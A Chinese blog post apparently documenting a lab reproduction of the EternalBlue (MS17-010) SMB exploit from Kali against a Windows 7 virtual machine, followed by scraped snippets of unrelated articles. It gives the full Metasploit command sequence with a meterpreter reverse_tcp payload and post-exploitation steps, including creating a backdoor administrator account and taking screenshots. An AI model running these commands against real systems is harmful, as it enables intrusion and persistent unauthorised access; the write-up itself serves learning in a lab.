网络攻防——永恒之蓝

article/2025/8/21 10:18:14

永恒之蓝

      • 1.引言
      • 2.永恒之蓝定义
      • 3.SMB协议
      • 3.windows7版本说明
      • 4.攻击实例
        • 4.1攻击者和被攻击者展示
        • 4.2详细攻击过程
        • 4.3接下来尝试攻击一下windows10
      • 5.参考文献

1.引言

    让一个不爱学习的人整天蒙英语题,听张宇的视频实在是枯燥了点,于是决定看看网安,积累积累一些有趣的玩意儿。然后,自己不是专业的,也不是为了工作,可能会查阅大佬的博文,然后把概念借鉴过来,会留下参考链接的,如果博主不同意引用直接评论我会删除的。好,引用张宇一句话:直接来吧。

2.永恒之蓝定义

    永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该程序出来不久就被微软通过打补丁修复。之后在windows7以上的版本中不再出现了。当年的攻击效果如下(找网安大佬要的图):
在这里插入图片描述

3.SMB协议

    SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

3.windows7版本说明

    我们都知道家庭版和专业版,直白点就是普通和高级,普通提供的功能有限。但是windows7里面还有一个旗舰版。其实对于专业版和旗舰版,两者只是功能上有少量差别,如果把Windows7旗舰版的BitLocker功能(BitLocker驱动器加密通过加密Windows操作系统卷上存储的所有数据可以更好地保护计算机中的数据)和35种语言之间任意切换功能去掉其实就等于是专业版。

4.攻击实例

4.1攻击者和被攻击者展示

(1)攻击机:kali
在这里插入图片描述

(2)靶机:windows7旗舰版
在这里插入图片描述

4.2详细攻击过程

(1)首先通过ifconfigipconfig分别查看kali和windows7的ip地址:

kali:192.168.58.132
windows7:192.168.58.134

(2)利用kali ping windows7,发现ping不通,于是关闭windows7的防火墙,再ping就能够ping通了,说明二者能够建立连接;
(3)输入如下指令打开kali数据库:

service postgresql status //查看数据库开启状态
service postgresql start //开启数据库
service postgresql status //再次查看数据库开启状态,确认开启

开启效果如下:
在这里插入图片描述
(4)数据库初始化:

msfdb init

(5)启动msf:

msfconsole

(6)搜索ms17_010漏洞(也就是永恒之蓝漏洞):

search ms17_010

    这个时候系统会展示kali中可以使用的扫描模块:
在这里插入图片描述
(7)选择扫描模块:

use auxiliary/scanner/smb/smb_ms17_010

(8)开始扫描:

use exploit/windows/smb/ms17_010_eternalblue

(9)设置本次扫描基本配置:

//设置扫描的靶机ip
set rhost 192.168.58.134
//设置携带的攻击载荷
set payload windows/x64/meterpreter/reverse_tcp
//设置监听的攻击机
set lhost 192.168.58.132

(10)利用exploit进行攻击:

exploit

    回到windows7中查看,虽然关闭了防火墙,但是受到永恒之蓝攻击之后windows7还是能够报危险提示的:
在这里插入图片描述
接下来可以进行一系列攻击了,给出几个例子:
(1)查看系统信息:

sysinfo

(2)创造出一个新的管理员出来

//创建用户
net user hack 123456 /add
//将用户升级为管理员
net localgroup administrators hack /add 

    但是其实有点尬,这样用户就能一眼看出来有多个用户了:
在这里插入图片描述
    由于第一个用户自带管理员权限,因此,如果用户很懂的话,可以直接在管理用户的地方删除用户:
在这里插入图片描述
    当然上面介绍的可能太专业了,之前在kali的基本使用中介绍了使用webcam_listwebcam_stream打开摄像头,但是虚拟机的旗舰版windows7直接提示没有摄像头,绷不住了。
    但是可以使用screenshot截个图。截图之后会提示文件的位置,但是这里直接找了半天都没看到,和前面介绍的windows攻击程序的生成位置一样,可能是出现在root目录下,因此,桌面右键,open as Root然后去根目录下查看,注意直接切换用户是不能够进入root的,会直接提示密码错误:
在这里插入图片描述

4.3接下来尝试攻击一下windows10

    所有操作一样,只是换一下ip地址:
在这里插入图片描述
确实攻击不了。

5.参考文献

(1)永恒之蓝漏洞利用及攻击


http://chatgpt.dhexx.cn/article/Kc7GEFxZ.shtml

相关文章

Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)

目录 一、永恒之蓝概述 二、SMB协议 三、准备工作 四、漏洞复现 1、主机发现 2、端口扫描 3、利用模块 五、演示功能 1.获取cmd 2.捕获屏幕 3.上传文件 4.下载文件 5.远程登录 6.上传后门 7.免杀加壳 8.运行wannacry 9.清除日志 六、预防方案 1.打开防火墙 …

ajax提交form表单+跨域

有时候我们需要提交form表单&#xff0c;而又不想影响跳转页面&#xff0c;同时还不影响浏览器的 正常访问&#xff0c;这个时候就用到了ajax提交 首先&#xff0c;要引入js文件 <script type"text/javascript" src"${ctx}/newoa/js/jquery.form.js"…

使用原生javascript实现ajax提交form表单

使用原生javascript实现ajax提交form表单 ============================ 1 准备表单 首先我们需要编写一个html代码,这里我是采用nodejs里面的jade模板引擎来进行生成html代码的。 form(action="/ajaxTest2",method="post",enctype="text/…

Jquery Ajax提交form表单

ajax技术带给我们的是良好的用户体验,同时,使用jquery可以简化开发,提高工作效率。 献上一个简单的例子: 前台代码: index.aspx <%@ Page Language="C#" AutoEventWireup="true" CodeBehind="index.aspx.cs" Inherits="AjaxDemo…

客户端调用服务端异常 —— 远程主机强迫关闭了一个现有的连接**(问题已解决)

客户端调用服务端异常 —— 远程主机强迫关闭了一个现有的连接&#xff08;问题已解决&#xff09; 今天跟大家分享一个日常出现的问题&#xff0c;今天前段调用的时候突然出现了远程主机强迫关闭了一个现有的连接的问题&#xff0c;先看问题图。 然后开始排查原因&#xff0…

频繁发送socket命令返回:[WinError 10054] 远程主机强迫关闭了一个现有的连接

第一类 错误原因&#xff1a;发送http请求太过频繁&#xff0c;引起远程主机的怀疑&#xff0c;被网站怀疑是恶意攻击行为。 解决方法&#xff1a; 在发送命令之后关闭连接&#xff0c;防止被认为恶意连接设置socket默认等待时间 设置读取信息的最大时间限制&#xff0c;如果…

关于Redis出现“java.io.IOException: 远程主机强迫关闭了一个现有的连接”的一次排查

背景 最近在使用springboot&#xff08;Windows下&#xff09;连接redis&#xff08;云服务器&#xff09;开发时发现一些问题&#xff1a;连接成功的情况下&#xff0c;在一段时间未交互数据后&#xff0c;再次通过连接与Redis传输数据回出现异常java.io.IOException: 远程主…

远程主机强迫关闭了一个现有的连接.

报错信息&#xff1a; 解决方法&#xff1a; 1.在命令行中查找占用“5037”端口的程序PID netstat -aon|findstr “5037”2. 打开任务管理器&#xff0c;找到相应的PID【15692】&#xff0c;将占用的端口关闭。 3. 发现adb.exe与Android Studio.exe共用同一个端口 adb.exe——…

xdm,请求帮助

这个怎么搞&#xff0c;xdm

Ubuntu 安装 XDM 2018 ( Xtreme Download Manager 2018 )

Xtreme下载管理器是一个功能强大的工具&#xff0c;可以将下载速度提高到500&#xff05;&#xff0c;保存来自YouTube&#xff0c;DailyMotion&#xff0c;Facebook&#xff0c;Vimeo&#xff0c;Google Video和1000多个其他网站的流媒体视频&#xff0c;恢复损坏/死亡下载&am…

Linux系统的下载神器XDM

自从装了双系统后一直在寻找一款媲美Windows系统中IDM的下载神器&#xff0c;XDM被我从云海中捞了出来&#xff01;堪比IDM的下载速度&#xff0c;亦是一款神器。 使用说明书 下载地址&#xff1a;https://sourceforge.net/projects/xdman/解压后&#xff0c;使用终端进入该…

获取网页视频,日常下载工具推荐——XDM

Xtreme Download Manage 下载地址与浏览器关联工具的好处 下载地址 点击下载 与浏览器关联 需要谷歌&#xff0c;火狐或其他插件包&#xff0c;这里只提供谷歌插件&#xff0c;其他自行百度。 下载地址 下载后将后缀.crx改为.zip&#xff0c;进行解压缩&#xff0c;然…

谷歌浏览器扩展程序XDM_设计师的谷歌Chrome浏览器拓展程序推荐!Design Service Center...

01 Dualsub --Youtube 视频双语翻译字幕 在我们使用Youtube时时常会遇到我们想看的视频&#xff0c;但往往因为没有中文字幕而导致无法观看&#xff0c;现在Dualsub这款插件就能实现你的愿望了。他可以让Youtube同时显示两种语言字幕&#xff0c;可以是中英文&#xff0c;也可以…

GBase XDM Cluster 产品介绍

1.1. 产品特点 GBase XDM Cluster V8产品的主要特点有&#xff1a; 标准化&#xff1a; 数据库集群管理系统的访问遵循轻型目录访问协议LDAP v3&#xff0c;从而保持应用的标准性和独立性&#xff0c;提升了产品的易用性。便于与应用系统对接&#xff0c;同时也能够有效地降…

谷歌浏览器扩展程序XDM_如何下载和安装扩展程序?

今天分享一下怎么找拓展程序和安装拓展程序,这也是昨天答应了大家的。这个扩展程序真的是一个好东西,能够让你的浏览器变成高效、便捷、省钱的工具。 很多普通浏览器也有扩展程序商店,但是这个数量、功能等各方面还是不如谷歌浏览器强大,所以这里建议使用谷歌浏览器,以下文…

linux xdm 启动执行文件,Linux下配置XDM登录服务器

第一步&#xff0c;我们在Linux系统下&#xff0c;修改/etc/X11/xdm/Xaccess文件&#xff0c;找到下面的语句&#xff1a; # * #any host can get a login window 去掉最前面的#号&#xff0c;成为 * #any host can get a login window 第二步&#xff0c;我们修改/etc/X11/gdm…

XDM2020 Java版类似IDM微软下载器的开源下载工具编译

这款XDM是开源下载工具里面功能比较全,界面比较好看,虽说还比不上IDM,很多细节上的处理都不是很好,但是作为一个开源下载器来说,已经很不错的了,接下来,我将会好好优化一番,以期能替代电脑中的IDM吧,比较迅雷越来越不友好了,IDM也没找着个长久能用的,用着用着就催你…

Linux下载神器XDM,代替IDM

Windows上IDM多线程下载非常强大&#xff0c;即能捕捉页面上的视频、图片、音频&#xff0c;又能作为浏览器下载器使用&#xff0c;但是IDM无法在Linux下使用&#xff0c;除非使用wine。不过我们可以在Linux中用XDM代替IDM。 XDM(Xtreme Download Manager) 下载安装 XDM下载…

Linux下载神器XDM

Window上IDMTampermonkey下载速度非常快&#xff0c;Linux系统上可以用XDM替代。 1.安装 &#xff08;1&#xff09;下载 Xtreme Download Manager下载 &#xff08;2&#xff09;解压&#xff0c;在./install.sh目录下打开终端&#xff0c;输入命令&#xff1a; sudo ./i…

Ubuntu 16.04 LTS安装XDM下载神器

XDM&#xff08;XStream Download Manager&#xff09;是一款下载神器&#xff0c;可以快速通过链接下载任何可以下载但网速受限的文件&#xff08;压缩包、文档、软件&#xff0c;等等&#xff09;&#xff0c;使用方便&#xff0c;操作简单。图1是使用XDM与浏览器下载同一个文…